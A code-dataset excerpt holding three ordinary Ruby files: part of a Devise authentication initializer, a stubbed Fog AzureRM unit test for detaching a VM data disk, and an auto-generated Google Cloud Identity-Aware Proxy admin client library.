authentication only for the # given strategies, for example, `config.http_authenticatable = [:database]` will # enable it only for database authentication. The supported strategies are: # :database = Support basic authentication with authentication key + password # config.http_authenticatable = false # If 401 status code should be returned for AJAX requests. True by default. # config.http_authenticatable_on_xhr = true # The realm used in Http Basic Authentication. 'Application' by default. # config.http_authentication_realm = 'Application' # It will change confirmation, password recovery and other workflows # to behave the same regardless if the e-mail provided was right or wrong. # Does not affect registerable. # config.paranoid = true # By default Devise will store the user in session. You can skip storage for # particular strategies by setting this option. # Notice that if you are skipping storage for all authentication paths, you # may want to disable generating routes to Devise's sessions controller by # passing skip: :sessions to `devise_for` in your config/routes.rb config.skip_session_storage = [:http_auth] # By default, Devise cleans up the CSRF token on authentication to # avoid CSRF token fixation attacks. This means that, when using AJAX # requests for sign in and sign up, you need to get a new CSRF token # from the server. You can disable this option at your own risk. # config.clean_up_csrf_token_on_authentication = true # When false, Devise will not attempt to reload routes on eager load. # This can reduce the time taken to boot the app but if your application # requires the Devise mappings to be loaded during boot time the application # won't boot properly. # config.reload_routes = true # ==> Configuration for :database_authenticatable # For bcrypt, this is the cost for hashing the password and defaults to 11. If # using other algorithms, it sets how many times you want the password to be hashed. # # Limiting the stretches to just one in testing will increase the performance of # your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use # a value less than 10 in other environments. Note that, for bcrypt (the default # algorithm), the cost increases exponentially with the number of stretches (e.g. # a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation). config.stretches = Rails.env.test? ? 1 : 11 # Set up a pepper to generate the hashed password. # config.pepper = 'f2de736614166e4d4e4453068a7d002403d791ee6f1cf4624f852c7e7a8bb5d5bdf6c79e1c68951a163cc5d7453d34a588b72b564ed8d775daa2a01d0bbe60eb' # Send a notification to the original email when the user's email is changed. # config.send_email_changed_notification = false # Send a notification email when the user's password is changed. # config.send_password_change_notification = false # ==> Configuration for :confirmable # A period that the user is allowed to access the website even without # confirming their account. For instance, if set to 2.days, the user will be # able to access the website for two days without confirming their account, # access will be blocked just in the third day. Default is 0.days, meaning # the user cannot access the website without confirming their account. # config.allow_unconfirmed_access_for = 2.days # A period that the user is allowed to confirm their account before their # token becomes invalid. For example, if set to 3.days, the user can confirm # their account within 3 days after the mail was sent, but on the fourth day # their account can't be confirmed with the token any more. # Default is nil, meaning there is no restriction on how long a user can take # before confirming their account. # config.confirm_within = 3.days # If true, requires any email changes to be confirmed (exactly the same way as # initial account confirmation) to be applied. Requires additional unconfirmed_email # db field (see migrations). Until confirmed, new email is stored in # unconfirmed_email column, and copied to email column on successful confirmation. config.reconfirmable = true # Defines which key will be used when confirming an account # config.confirmation_keys = [:email] # ==> Configuration for :rememberable # The time the user will be remembered without asking for credentials again. # config.remember_for = 2.weeks # Invalidates all the remember me tokens when the user signs out. config.expire_all_remember_me_on_sign_out = true # If true, extends the user's remember period when remembered via cookie. # config.extend_remember_period = false # Options to be passed to the created cookie. For instance, you can set # secure: true in order to force SSL only cookies. # config.rememberable_options = {} # ==> Configuration for :validatable # Range for password length. config.password_length = 6..128 # Email regex used to validate email formats. It simply asserts that # one (and only one) @ exists in the given string. This is mainly # to give user feedback and not to assert the e-mail validity. config.email_regexp = /\A[^@\s]+@[^@\s]+\z/ # ==> Configuration for :timeoutable # The time you want to timeout the user session without activity. After this # time the user will be asked for credentials again. Default is 30 minutes. # config.timeout_in = 30.minutes # ==> Configuration for :lockable # Defines which strategy will be used to lock an account. # :failed_attempts = Locks an account after a number of failed attempts to sign in. # :none = No lock strategy. You should handle locking by yourself. # config.lock_strategy = :failed_attempts # Defines which key will be used when locking and unlocking an account # config.unlock_keys = [:email] # Defines which strategy will be used to unlock an account. # :email = Sends an unlock link to the user email # :time = Re-enables login after a certain amount of time (see :unlock_in below) # :both = Enables both strategies # :none = No unlock strategy. You should handle unlocking by yourself. # config.unlock_strategy = :both # Number of authentication tries before locking an account if lock_strategy # is failed attempts. # config.maximum_attempts = 20 # Time interval to unlock the account if :time is enabled as unlock_strategy. # config.unlock_in = 1.hour # Warn on the last attempt before the account is locked. # config.last_attempt_warning = true # ==> Configuration for :recoverable # # Defines which key will be used when recovering the password for an account # config.reset_password_keys = [:email] # Time interval you can reset your password with a reset password key. # Don't put a too small interval or your users won't have the time to # change their passwords. config.reset_password_within = 6.hours # When set to false, does not sign a user in automatically after their password is # reset. Defaults to true, so a user is signed in automatically after a reset. # config.sign_in_after_reset_password = true # ==> Configuration for :encryptable # Allow you to use another hashing or encryption algorithm besides bcrypt (default). # You can use :sha1, :sha512 or algorithms from others authentication tools as # :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20 # for default behavior) and :restful_authentication_sha1 (then you should set # stretches to 10, and copy REST_AUTH_SITE_KEY to pepper). # # Require the `devise-encryptable` gem when using anything other than bcrypt # config.encryptor = :sha512 # ==> Scopes configuration # Turn scoped views on. Before rendering "sessions/new", it will first check for # "users/sessions/new". It's turned off by default because it's slower if you # are using only default views. # config.scoped_views = false # Configure the default scope given to Warden. By default it's the first # devise role declared in your routes (usually :user). # config.default_scope = :user # Set this configuration to false if you want /users/sign_out to sign out # only the current scope. By default, Devise signs out all scopes. # config.sign_out_all_scopes = true # ==> Navigation configuration # Lists the formats that should be treated as navigational. Formats like # :html, should redirect to the sign in page when the user does not have # access, but formats like :xml or :json, should return 401. # # If you have any extra navigational formats, like :iphone or :mobile, you # should add them to the navigational formats lists. # # The "*/*" below is required to match Internet Explorer requests. # config.navigational_formats = ['*/*', :html] # The default HTTP method used to sign out a resource. Default is :delete. config.sign_out_via = :delete # ==> OmniAuth # Add a new OmniAuth provider. Check the wiki for more information on setting # up on your models and hooks. # config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo' # ==> Warden configuration # If you want to use other strategies, that are not supported by Devise, or # change the failure app, you can configure them inside the config.warden block. # # config.warden do |manager| # manager.intercept_401 = false # manager.default_strategies(scope: :user).unshift :some_external_strategy # end # ==> Mountable engine configurations # When using Devise inside an engine, let's call it `MyEngine`, and this engine # is mountable, there are some extra configurations to be taken into account. # The following options are available, assuming the engine is mounted as: # # mount MyEngine, at: '/my_engine' # # The router that invoked `devise_for`, in the example above, would be: # config.router_name = :my_engine # # When using OmniAuth, Devise cannot automatically set OmniAuth path, # so you need to do it manually. For the users scope, it would be: # config.omniauth_path_prefix = '/my_engine/users/auth' end
49.071942
154
0.751356
1a1f2faaabbdc4a623bc0a5f1db3ca90b07a3283
1,484
require File.expand_path '../../test_helper', __dir__ # Test class for Detach Data Disk from VM Request class TestDetachDataDiskFromVM < Minitest::Test def setup @service = Fog::Compute::AzureRM.new(credentials) @compute_client = @service.instance_variable_get(:@compute_mgmt_client) @virtual_machines = @compute_client.virtual_machines end def test_detach_data_disk_from_vm_success get_vm_response = ApiStub::Requests::Compute::VirtualMachine.create_virtual_machine_response(@compute_client) update_vm_response = ApiStub::Requests::Compute::VirtualMachine.detach_data_disk_from_vm_response(@compute_client) @virtual_machines.stub :get, get_vm_response do @virtual_machines.stub :create_or_update, update_vm_response do assert_equal @service.detach_data_disk_from_vm('fog-test-rg', 'fog-test-vm', 'mydatadisk1'), update_vm_response end end end def test_detach_data_disk_from_vm_failure get_vm_response = ApiStub::Requests::Compute::VirtualMachine.create_virtual_machine_response(@compute_client) update_vm_response = proc { fail MsRestAzure::AzureOperationError.new(nil, nil, 'error' => { 'message' => 'mocked exception' }) } @virtual_machines.stub :get, get_vm_response do @virtual_machines.stub :create_or_update, update_vm_response do assert_raises RuntimeError do @service.detach_data_disk_from_vm('fog-test-rg', 'fog-test-vm', 'mydatadisk1') end end end end end
44.969697
133
0.764151
d56830318a328f6d3c4c97e206ed307136001b79
37,035
# frozen_string_literal: true # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Auto-generated by gapic-generator-ruby. DO NOT EDIT! require "google/cloud/errors" require "google/cloud/iap/v1/service_pb" module Google module Cloud module Iap module V1 module IdentityAwareProxyAdminService ## # Client for the IdentityAwareProxyAdminService service. # # APIs for Identity-Aware Proxy Admin configurations. # class Client # @private attr_reader :identity_aware_proxy_admin_service_stub ## # Configure the IdentityAwareProxyAdminService Client class. # # See {::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client::Configuration} # for a description of the configuration fields. # # @example # # # Modify the configuration for all IdentityAwareProxyAdminService clients # ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client.configure do |config| # config.timeout = 10.0 # end # # @yield [config] Configure the Client client. # @yieldparam config [Client::Configuration] # # @return [Client::Configuration] # def self.configure @configure ||= begin namespace = ["Google", "Cloud", "Iap", "V1"] parent_config = while namespace.any? parent_name = namespace.join "::" parent_const = const_get parent_name break parent_const.configure if parent_const.respond_to? :configure namespace.pop end default_config = Client::Configuration.new parent_config default_config.timeout = 60.0 default_config end yield @configure if block_given? @configure end ## # Configure the IdentityAwareProxyAdminService Client instance. # # The configuration is set to the derived mode, meaning that values can be changed, # but structural changes (adding new fields, etc.) are not allowed. Structural changes # should be made on {Client.configure}. # # See {::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client::Configuration} # for a description of the configuration fields. # # @yield [config] Configure the Client client. # @yieldparam config [Client::Configuration] # # @return [Client::Configuration] # def configure yield @config if block_given? @config end ## # Create a new IdentityAwareProxyAdminService client object. # # @example # # # Create a client using the default configuration # client = ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client.new # # # Create a client using a custom configuration # client = ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client.new do |config| # config.timeout = 10.0 # end # # @yield [config] Configure the IdentityAwareProxyAdminService client. # @yieldparam config [Client::Configuration] # def initialize # These require statements are intentionally placed here to initialize # the gRPC module only when it's required. # See https://github.com/googleapis/toolkit/issues/446 require "gapic/grpc" require "google/cloud/iap/v1/service_services_pb" # Create the configuration object @config = Configuration.new Client.configure # Yield the configuration if needed yield @config if block_given? # Create credentials credentials = @config.credentials # Use self-signed JWT if the endpoint is unchanged from default, # but only if the default endpoint does not have a region prefix. enable_self_signed_jwt = @config.endpoint == Client.configure.endpoint && [email protected](".").first.include?("-") credentials ||= Credentials.default scope: @config.scope, enable_self_signed_jwt: enable_self_signed_jwt if credentials.is_a?(::String) || credentials.is_a?(::Hash) credentials = Credentials.new credentials, scope: @config.scope end @quota_project_id = @config.quota_project @quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id @identity_aware_proxy_admin_service_stub = ::Gapic::ServiceStub.new( ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Stub, credentials: credentials, endpoint: @config.endpoint, channel_args: @config.channel_args, interceptors: @config.interceptors ) end # Service calls ## # Sets the access control policy for an Identity-Aware Proxy protected # resource. Replaces any existing policy. # More information about managing access via IAP can be found at: # https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api # # @overload set_iam_policy(request, options = nil) # Pass arguments to `set_iam_policy` via a request object, either of type # {::Google::Iam::V1::SetIamPolicyRequest} or an equivalent Hash. # # @param request [::Google::Iam::V1::SetIamPolicyRequest, ::Hash] # A request object representing the call parameters. Required. To specify no # parameters, or to keep all the default parameter values, pass an empty Hash. # @param options [::Gapic::CallOptions, ::Hash] # Overrides the default settings for this call, e.g, timeout, retries, etc. Optional. # # @overload set_iam_policy(resource: nil, policy: nil) # Pass arguments to `set_iam_policy` via keyword arguments. Note that at # least one keyword argument is required. To specify no parameters, or to keep all # the default parameter values, pass an empty Hash as a request object (see above). # # @param resource [::String] # REQUIRED: The resource for which the policy is being specified. # See the operation documentation for the appropriate value for this field. # @param policy [::Google::Iam::V1::Policy, ::Hash] # REQUIRED: The complete policy to be applied to the `resource`. The size of # the policy is limited to a few 10s of KB. An empty policy is a # valid policy but certain Cloud Platform services (such as Projects) # might reject them. # # @yield [response, operation] Access the result along with the RPC operation # @yieldparam response [::Google::Iam::V1::Policy] # @yieldparam operation [::GRPC::ActiveCall::Operation] # # @return [::Google::Iam::V1::Policy] # # @raise [::Google::Cloud::Error] if the RPC is aborted. # def set_iam_policy request, options = nil raise ::ArgumentError, "request must be provided" if request.nil? request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::SetIamPolicyRequest # Converts hash and nil to an options object options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h # Customize the options with defaults metadata = @config.rpcs.set_iam_policy.metadata.to_h # Set x-goog-api-client and x-goog-user-project headers metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \ lib_name: @config.lib_name, lib_version: @config.lib_version, gapic_version: ::Google::Cloud::Iap::V1::VERSION metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id header_params = {} if request.resource header_params["resource"] = request.resource end request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&") metadata[:"x-goog-request-params"] ||= request_params_header options.apply_defaults timeout: @config.rpcs.set_iam_policy.timeout, metadata: metadata, retry_policy: @config.rpcs.set_iam_policy.retry_policy options.apply_defaults timeout: @config.timeout, metadata: @config.metadata, retry_policy: @config.retry_policy @identity_aware_proxy_admin_service_stub.call_rpc :set_iam_policy, request, options: options do |response, operation| yield response, operation if block_given? return response end rescue ::GRPC::BadStatus => e raise ::Google::Cloud::Error.from_error(e) end ## # Gets the access control policy for an Identity-Aware Proxy protected # resource. # More information about managing access via IAP can be found at: # https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api # # @overload get_iam_policy(request, options = nil) # Pass arguments to `get_iam_policy` via a request object, either of type # {::Google::Iam::V1::GetIamPolicyRequest} or an equivalent Hash. # # @param request [::Google::Iam::V1::GetIamPolicyRequest, ::Hash] # A request object representing the call parameters. Required. To specify no # parameters, or to keep all the default parameter values, pass an empty Hash. # @param options [::Gapic::CallOptions, ::Hash] # Overrides the default settings for this call, e.g, timeout, retries, etc. Optional. # # @overload get_iam_policy(resource: nil, options: nil) # Pass arguments to `get_iam_policy` via keyword arguments. Note that at # least one keyword argument is required. To specify no parameters, or to keep all # the default parameter values, pass an empty Hash as a request object (see above). # # @param resource [::String] # REQUIRED: The resource for which the policy is being requested. # See the operation documentation for the appropriate value for this field. # @param options [::Google::Iam::V1::GetPolicyOptions, ::Hash] # OPTIONAL: A `GetPolicyOptions` object for specifying options to # `GetIamPolicy`. This field is only used by Cloud IAM. # # @yield [response, operation] Access the result along with the RPC operation # @yieldparam response [::Google::Iam::V1::Policy] # @yieldparam operation [::GRPC::ActiveCall::Operation] # # @return [::Google::Iam::V1::Policy] # # @raise [::Google::Cloud::Error] if the RPC is aborted. # def get_iam_policy request, options = nil raise ::ArgumentError, "request must be provided" if request.nil? request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::GetIamPolicyRequest # Converts hash and nil to an options object options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h # Customize the options with defaults metadata = @config.rpcs.get_iam_policy.metadata.to_h # Set x-goog-api-client and x-goog-user-project headers metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \ lib_name: @config.lib_name, lib_version: @config.lib_version, gapic_version: ::Google::Cloud::Iap::V1::VERSION metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id header_params = {} if request.resource header_params["resource"] = request.resource end request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&") metadata[:"x-goog-request-params"] ||= request_params_header options.apply_defaults timeout: @config.rpcs.get_iam_policy.timeout, metadata: metadata, retry_policy: @config.rpcs.get_iam_policy.retry_policy options.apply_defaults timeout: @config.timeout, metadata: @config.metadata, retry_policy: @config.retry_policy @identity_aware_proxy_admin_service_stub.call_rpc :get_iam_policy, request, options: options do |response, operation| yield response, operation if block_given? return response end rescue ::GRPC::BadStatus => e raise ::Google::Cloud::Error.from_error(e) end ## # Returns permissions that a caller has on the Identity-Aware Proxy protected # resource. # More information about managing access via IAP can be found at: # https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api # # @overload test_iam_permissions(request, options = nil) # Pass arguments to `test_iam_permissions` via a request object, either of type # {::Google::Iam::V1::TestIamPermissionsRequest} or an equivalent Hash. # # @param request [::Google::Iam::V1::TestIamPermissionsRequest, ::Hash] # A request object representing the call parameters. Required. To specify no # parameters, or to keep all the default parameter values, pass an empty Hash. # @param options [::Gapic::CallOptions, ::Hash] # Overrides the default settings for this call, e.g, timeout, retries, etc. Optional. # # @overload test_iam_permissions(resource: nil, permissions: nil) # Pass arguments to `test_iam_permissions` via keyword arguments. Note that at # least one keyword argument is required. To specify no parameters, or to keep all # the default parameter values, pass an empty Hash as a request object (see above). # # @param resource [::String] # REQUIRED: The resource for which the policy detail is being requested. # See the operation documentation for the appropriate value for this field. # @param permissions [::Array<::String>] # The set of permissions to check for the `resource`. Permissions with # wildcards (such as '*' or 'storage.*') are not allowed. For more # information see # [IAM Overview](https://cloud.google.com/iam/docs/overview#permissions). # # @yield [response, operation] Access the result along with the RPC operation # @yieldparam response [::Google::Iam::V1::TestIamPermissionsResponse] # @yieldparam operation [::GRPC::ActiveCall::Operation] # # @return [::Google::Iam::V1::TestIamPermissionsResponse] # # @raise [::Google::Cloud::Error] if the RPC is aborted. # def test_iam_permissions request, options = nil raise ::ArgumentError, "request must be provided" if request.nil? request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::TestIamPermissionsRequest # Converts hash and nil to an options object options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h # Customize the options with defaults metadata = @config.rpcs.test_iam_permissions.metadata.to_h # Set x-goog-api-client and x-goog-user-project headers metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \ lib_name: @config.lib_name, lib_version: @config.lib_version, gapic_version: ::Google::Cloud::Iap::V1::VERSION metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id header_params = {} if request.resource header_params["resource"] = request.resource end request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&") metadata[:"x-goog-request-params"] ||= request_params_header options.apply_defaults timeout: @config.rpcs.test_iam_permissions.timeout, metadata: metadata, retry_policy: @config.rpcs.test_iam_permissions.retry_policy options.apply_defaults timeout: @config.timeout, metadata: @config.metadata, retry_policy: @config.retry_policy @identity_aware_proxy_admin_service_stub.call_rpc :test_iam_permissions, request, options: options do |response, operation| yield response, operation if block_given? return response end rescue ::GRPC::BadStatus => e raise ::Google::Cloud::Error.from_error(e) end ## # Gets the IAP settings on a particular IAP protected resource. # # @overload get_iap_settings(request, options = nil) # Pass arguments to `get_iap_settings` via a request object, either of type # {::Google::Cloud::Iap::V1::GetIapSettingsRequest} or an equivalent Hash. # # @param request [::Google::Cloud::Iap::V1::GetIapSettingsRequest, ::Hash] # A request object representing the call parameters. Required. To specify no # parameters, or to keep all the default parameter values, pass an empty Hash. # @param options [::Gapic::CallOptions, ::Hash] # Overrides the default settings for this call, e.g, timeout, retries, etc. Optional. # # @overload get_iap_settings(name: nil) # Pass arguments to `get_iap_settings` via keyword arguments. Note that at # least one keyword argument is required. To specify no parameters, or to keep all # the default parameter values, pass an empty Hash as a request object (see above). # # @param name [::String] # Required. The resource name for which to retrieve the settings. # Authorization: Requires the `getSettings` permission for the associated # resource. # # @yield [response, operation] Access the result along with the RPC operation # @yieldparam response [::Google::Cloud::Iap::V1::IapSettings] # @yieldparam operation [::GRPC::ActiveCall::Operation] # # @return [::Google::Cloud::Iap::V1::IapSettings] # # @raise [::Google::Cloud::Error] if the RPC is aborted. # def get_iap_settings request, options = nil raise ::ArgumentError, "request must be provided" if request.nil? request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Iap::V1::GetIapSettingsRequest # Converts hash and nil to an options object options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h # Customize the options with defaults metadata = @config.rpcs.get_iap_settings.metadata.to_h # Set x-goog-api-client and x-goog-user-project headers metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \ lib_name: @config.lib_name, lib_version: @config.lib_version, gapic_version: ::Google::Cloud::Iap::V1::VERSION metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id header_params = {} if request.name header_params["name"] = request.name end request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&") metadata[:"x-goog-request-params"] ||= request_params_header options.apply_defaults timeout: @config.rpcs.get_iap_settings.timeout, metadata: metadata, retry_policy: @config.rpcs.get_iap_settings.retry_policy options.apply_defaults timeout: @config.timeout, metadata: @config.metadata, retry_policy: @config.retry_policy @identity_aware_proxy_admin_service_stub.call_rpc :get_iap_settings, request, options: options do |response, operation| yield response, operation if block_given? return response end rescue ::GRPC::BadStatus => e raise ::Google::Cloud::Error.from_error(e) end ## # Updates the IAP settings on a particular IAP protected resource. It # replaces all fields unless the `update_mask` is set. # # @overload update_iap_settings(request, options = nil) # Pass arguments to `update_iap_settings` via a request object, either of type # {::Google::Cloud::Iap::V1::UpdateIapSettingsRequest} or an equivalent Hash. # # @param request [::Google::Cloud::Iap::V1::UpdateIapSettingsRequest, ::Hash] # A request object representing the call parameters. Required. To specify no # parameters, or to keep all the default parameter values, pass an empty Hash. # @param options [::Gapic::CallOptions, ::Hash] # Overrides the default settings for this call, e.g, timeout, retries, etc. Optional. # # @overload update_iap_settings(iap_settings: nil, update_mask: nil) # Pass arguments to `update_iap_settings` via keyword arguments. Note that at # least one keyword argument is required. To specify no parameters, or to keep all # the default parameter values, pass an empty Hash as a request object (see above). # # @param iap_settings [::Google::Cloud::Iap::V1::IapSettings, ::Hash] # Required. The new values for the IAP settings to be updated. # Authorization: Requires the `updateSettings` permission for the associated # resource. # @param update_mask [::Google::Protobuf::FieldMask, ::Hash] # The field mask specifying which IAP settings should be updated. # If omitted, the all of the settings are updated. See # https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask # # @yield [response, operation] Access the result along with the RPC operation # @yieldparam response [::Google::Cloud::Iap::V1::IapSettings] # @yieldparam operation [::GRPC::ActiveCall::Operation] # # @return [::Google::Cloud::Iap::V1::IapSettings] # # @raise [::Google::Cloud::Error] if the RPC is aborted. # def update_iap_settings request, options = nil raise ::ArgumentError, "request must be provided" if request.nil? request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Iap::V1::UpdateIapSettingsRequest # Converts hash and nil to an options object options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h # Customize the options with defaults metadata = @config.rpcs.update_iap_settings.metadata.to_h # Set x-goog-api-client and x-goog-user-project headers metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \ lib_name: @config.lib_name, lib_version: @config.lib_version, gapic_version: ::Google::Cloud::Iap::V1::VERSION metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id header_params = {} if request.iap_settings&.name header_params["iap_settings.name"] = request.iap_settings.name end request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&") metadata[:"x-goog-request-params"] ||= request_params_header options.apply_defaults timeout: @config.rpcs.update_iap_settings.timeout, metadata: metadata, retry_policy: @config.rpcs.update_iap_settings.retry_policy options.apply_defaults timeout: @config.timeout, metadata: @config.metadata, retry_policy: @config.retry_policy @identity_aware_proxy_admin_service_stub.call_rpc :update_iap_settings, request, options: options do |response, operation| yield response, operation if block_given? return response end rescue ::GRPC::BadStatus => e raise ::Google::Cloud::Error.from_error(e) end ## # Configuration class for the IdentityAwareProxyAdminService API. # # This class represents the configuration for IdentityAwareProxyAdminService, # providing control over timeouts, retry behavior, logging, transport # parameters, and other low-level controls. Certain parameters can also be # applied individually to specific RPCs. See # {::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client::Configuration::Rpcs} # for a list of RPCs that can be configured independently. # # Configuration can be applied globally to all clients, or to a single client # on construction. # # @example # # # Modify the global config, setting the timeout for # # set_iam_policy to 20 seconds, # # and all remaining timeouts to 10 seconds. # ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client.configure do |config| # config.timeout = 10.0 # config.rpcs.set_iam_policy.timeout = 20.0 # end # # # Apply the above configuration only to a new client. # client = ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client.new do |config| # config.timeout = 10.0 # config.rpcs.set_iam_policy.timeout = 20.0 # end # # @!attribute [rw] endpoint # The hostname or hostname:port of the service endpoint. # Defaults to `"iap.googleapis.com"`. # @return [::String] # @!attribute [rw] credentials # Credentials to send with calls. You may provide any of the following types: # * (`String`) The path to a service account key file in JSON format # * (`Hash`) A service account key as a Hash # * (`Google::Auth::Credentials`) A googleauth credentials object # (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html)) # * (`Signet::OAuth2::Client`) A signet oauth2 client object # (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html)) # * (`GRPC::Core::Channel`) a gRPC channel with included credentials # * (`GRPC::Core::ChannelCredentials`) a gRPC credentails object # * (`nil`) indicating no credentials # @return [::Object] # @!attribute [rw] scope # The OAuth scopes # @return [::Array<::String>] # @!attribute [rw] lib_name # The library name as recorded in instrumentation and logging # @return [::String] # @!attribute [rw] lib_version # The library version as recorded in instrumentation and logging # @return [::String] # @!attribute [rw] channel_args # Extra parameters passed to the gRPC channel. Note: this is ignored if a # `GRPC::Core::Channel` object is provided as the credential. # @return [::Hash] # @!attribute [rw] interceptors # An array of interceptors that are run before calls are executed. # @return [::Array<::GRPC::ClientInterceptor>] # @!attribute [rw] timeout # The call timeout in seconds. # @return [::Numeric] # @!attribute [rw] metadata # Additional gRPC headers to be sent with the call. # @return [::Hash{::Symbol=>::String}] # @!attribute [rw] retry_policy # The retry policy. The value is a hash with the following keys: # * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds. # * `:max_delay` (*type:* `Numeric`) - The max delay in seconds. # * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier. # * `:retry_codes` (*type:* `Array<String>`) - The error codes that should # trigger a retry. # @return [::Hash] # @!attribute [rw] quota_project # A separate project against which to charge quota. # @return [::String] # class Configuration extend ::Gapic::Config config_attr :endpoint, "iap.googleapis.com", ::String config_attr :credentials, nil do |value| allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil] allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC allowed.any? { |klass| klass === value } end config_attr :scope, nil, ::String, ::Array, nil config_attr :lib_name, nil, ::String, nil config_attr :lib_version, nil, ::String, nil config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil) config_attr :interceptors, nil, ::Array, nil config_attr :timeout, nil, ::Numeric, nil config_attr :metadata, nil, ::Hash, nil config_attr :retry_policy, nil, ::Hash, ::Proc, nil config_attr :quota_project, nil, ::String, nil # @private def initialize parent_config = nil @parent_config = parent_config unless parent_config.nil? yield self if block_given? end ## # Configurations for individual RPCs # @return [Rpcs] # def rpcs @rpcs ||= begin parent_rpcs = nil parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs) Rpcs.new parent_rpcs end end ## # Configuration RPC class for the IdentityAwareProxyAdminService API. # # Includes fields providing the configuration for each RPC in this service. # Each configuration object is of type `Gapic::Config::Method` and includes # the following configuration fields: # # * `timeout` (*type:* `Numeric`) - The call timeout in seconds # * `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers # * `retry_policy (*type:* `Hash`) - The retry policy. The policy fields # include the following keys: # * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds. # * `:max_delay` (*type:* `Numeric`) - The max delay in seconds. # * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier. # * `:retry_codes` (*type:* `Array<String>`) - The error codes that should # trigger a retry. # class Rpcs ## # RPC-specific configuration for `set_iam_policy` # @return [::Gapic::Config::Method] # attr_reader :set_iam_policy ## # RPC-specific configuration for `get_iam_policy` # @return [::Gapic::Config::Method] # attr_reader :get_iam_policy ## # RPC-specific configuration for `test_iam_permissions` # @return [::Gapic::Config::Method] # attr_reader :test_iam_permissions ## # RPC-specific configuration for `get_iap_settings` # @return [::Gapic::Config::Method] # attr_reader :get_iap_settings ## # RPC-specific configuration for `update_iap_settings` # @return [::Gapic::Config::Method] # attr_reader :update_iap_settings # @private def initialize parent_rpcs = nil set_iam_policy_config = parent_rpcs.set_iam_policy if parent_rpcs.respond_to? :set_iam_policy @set_iam_policy = ::Gapic::Config::Method.new set_iam_policy_config get_iam_policy_config = parent_rpcs.get_iam_policy if parent_rpcs.respond_to? :get_iam_policy @get_iam_policy = ::Gapic::Config::Method.new get_iam_policy_config test_iam_permissions_config = parent_rpcs.test_iam_permissions if parent_rpcs.respond_to? :test_iam_permissions @test_iam_permissions = ::Gapic::Config::Method.new test_iam_permissions_config get_iap_settings_config = parent_rpcs.get_iap_settings if parent_rpcs.respond_to? :get_iap_settings @get_iap_settings = ::Gapic::Config::Method.new get_iap_settings_config update_iap_settings_config = parent_rpcs.update_iap_settings if parent_rpcs.respond_to? :update_iap_settings @update_iap_settings = ::Gapic::Config::Method.new update_iap_settings_config yield self if block_given? end end end end end end end end end
51.797203
137
0.56992
f7f351a95c6a3871abd68cfcebba9839bf9cec8c
14,885
